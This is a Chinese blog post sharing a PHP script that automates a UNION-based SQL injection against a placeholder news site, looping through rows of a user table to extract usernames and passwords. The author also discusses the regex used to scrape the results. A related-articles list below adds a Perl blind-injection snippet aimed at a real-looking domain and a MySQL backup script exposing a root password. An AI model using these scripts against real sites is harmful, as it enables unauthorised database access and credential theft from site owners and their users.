写一个php小脚本辅助渗透测试

因为一个注入要爬行一些数据，然后写的一个小脚本，能写脚本来辅助渗透，也算是里程碑。哈哈哈

<?php
$num = 1;
while ($num <= 39) {
$web_url =  "http://www.xxx.com/shownews.asp?id=626%0AUNION%0ASELECT%0Atop%0A1%0A1,user_username,3,user_password,5,6%0Afrom%0A(select%0Atop%0A1%0Auser_username,user_phone%0Afrom%0A(select%0Atop%0A".$num."%0Auser_username,user_phone%0Afrom%0Azy_user%0Awhere%0A1=1%0Aorder%0Aby%0Auser_username)%0At%0Aorder%0Aby%0Auser_username%0Adesc)t";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL,$web_url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
$html_code = curl_exec($curl);
$re = "/<div class=\"helpcontent\">[\s\S]*div>/U";//U取消贪婪模式
if(preg_match_all($re, $html_code, $arr)){
    print_r($arr[0]);
}
curl_close($curl);
$num = $num + 1;
echo "<br />";
}
 ?>

这里遇到了最大的问题还是正则匹配。匹配那个换行。因为html标签是这样的。

  <div class="news_list fr">
	 <h1>wtmpvp</h1>
     <div class="helpcontent">
		这里是要匹配的内容
	 </div>
	</div>

可见匹配当中有换行，且一大堆空格。

然后写半天写正则写不出来。贼尴尬。

时间： 2024-08-24 15:30:16

写一个php小脚本辅助渗透测试的相关文章

用Python写一个ftp下载脚本

用Python写一个ftp下载脚本 ----基于Red Hat Enterprise Linux Server release 6.4 (Santiago):python 2.6.6 Ps:少侠我接触Python半个月以来接到的第一个需求,虽然如此简单的一个脚本,少侠我磕磕绊绊却用了将近一天半的时间才写出来,但还是很开心,毕竟也粗来了,废话不多说,切入正题.因为一开始没有用过ftplib模块,所以各种谷歌度娘一堆资料杂乱不堪,话不清,理不乱的,本文实现的功能简单,下面介绍一下,以免误导读者. 需

利用列表的知识写一个购物小程序

利用列表,写一个购物小程序,实现显示商品,显示余额,显示购物车的商品,可以随时退出. 1 product_list = [ 2 ('Mac', 9000), 3 ('Kindle', 800), 4 ('tesla', 900000), 5 ('python book', 105), 6 ('bike', 2000), 7 ] 8 9 saving = input('please input your money:') 10 shopping_car = [] 11 if saving.isdi

一个换算小程序引发的测试血案

请原谅我的标题写的有些夸张,但实际情况往往比想象的更离奇.好了进入主题.小A最近正在学习C语言,这时候小A上小学的儿子小B跑过来问:"爸爸,这道数学题怎么算?",小A看了看题目说"一百天是多少个礼拜零多少天?" 好了,我们的小A,看到题目后不假思索,一迅雷不及掩耳盗铃之势写下了如下代码: #include <stdio.h> int main(void) { int days; int week,day; printf("please in p

手把手教你写一个RN小程序!

时间过得真快,眨眼已经快3年了! 1.我的第一个App 还记得我14年初写的第一个iOS小程序,当时是给别人写的一个单机的相册,也是我开发的第一个完整的app,虽然功能挺少,但是耐不住心中的激动啊,现在我开始学react native,那么现在对于react native也算是有所了解了,就用网上的接口开发一个小程序,现在带大家来写这个程序!接口是用看知乎的API,简简单单的只有get,可以从这里入门,也算是带大家入门吧,过后我会把源代码放在我的github上,前期项目肯定特别简陋,后面慢慢来优

测试一个注入小脚本

1 use warnings; 2 use strict; 3 use LWP::Simple; 4 my @result; 5 my $i=1; 6 do{ 7 for(my $count=0;$count <=255;$count++){ 8 my $result = get("http://www.btc918.com//Chart/getJsonData?market=1' or ( select if(ascii(substr((select user()),$i,1))=$co

怎么写一个Auto js脚本

目录 1. 安装合适的编写工具 2. 配置合适的编写环境 3. 学习Js和Autojs开发文档 4. Autojs的一些配置和注意事项 1. 安装合适的编写工具我的方案是VScode+安卓模拟器其实可供参考的方案有很多,Auto js APP本省就支持编写脚本并运行,但是手机屏幕太小了,同时在一个屏幕进行快速多任务操作难谈效率而且调试起来不太方便,所以比较好的方案是手机+电脑即使是手机+电脑也是不太理想,因为你的焦点一会儿跑到手机上一会儿再回到电脑上;为了解决这个问题我最初学到的是手机投屏

用canvas写一个h5小游戏

这篇文章我们来讲一讲用canvas画一个躲水果的小游戏.就是通过手指控制一个人物移动来躲避水果,若发生碰撞,则游戏结束. 我们定义一个game_control对象来处理初始化,事件绑定,游戏开始,游戏结果判定,游戏结束等判定. 在游戏中,我们需要一个人物以及三种水果的图片,我们做成了雪碧图. 接下来直接上代码吧~ 首先我们定义一个ship对象,3个水果.一个人物都是基于这个对象的. function ship(options){ if (options) { var width=options.

pure-ftpd 写一个自动安装脚本shell

运行脚本后输入 yes 就会自动安装 #!/bin/bash port=`netstat -lnp|grep :21|wc -l` check_ok() { if [ $? -eq 0 ];then echo "check ok" else echo "check error " && exit fi } read -p "AUto install ftp input 'yes' inst

MySQL备份脚本的一个简单小脚本

#!/bin/bash #记录备份的时间echo "-----"$(date +"%y-%m-%d %H:%M:%S")"-----" >> /data/backup_mysql/record.log #定义变量 MYUSER=rootMYPASSWORD=29749716#@HeiniaoSOCKET=/data/mysql/mysql.sockMYCMD="mysql -u $MYUSER -p$MYPASSWORD -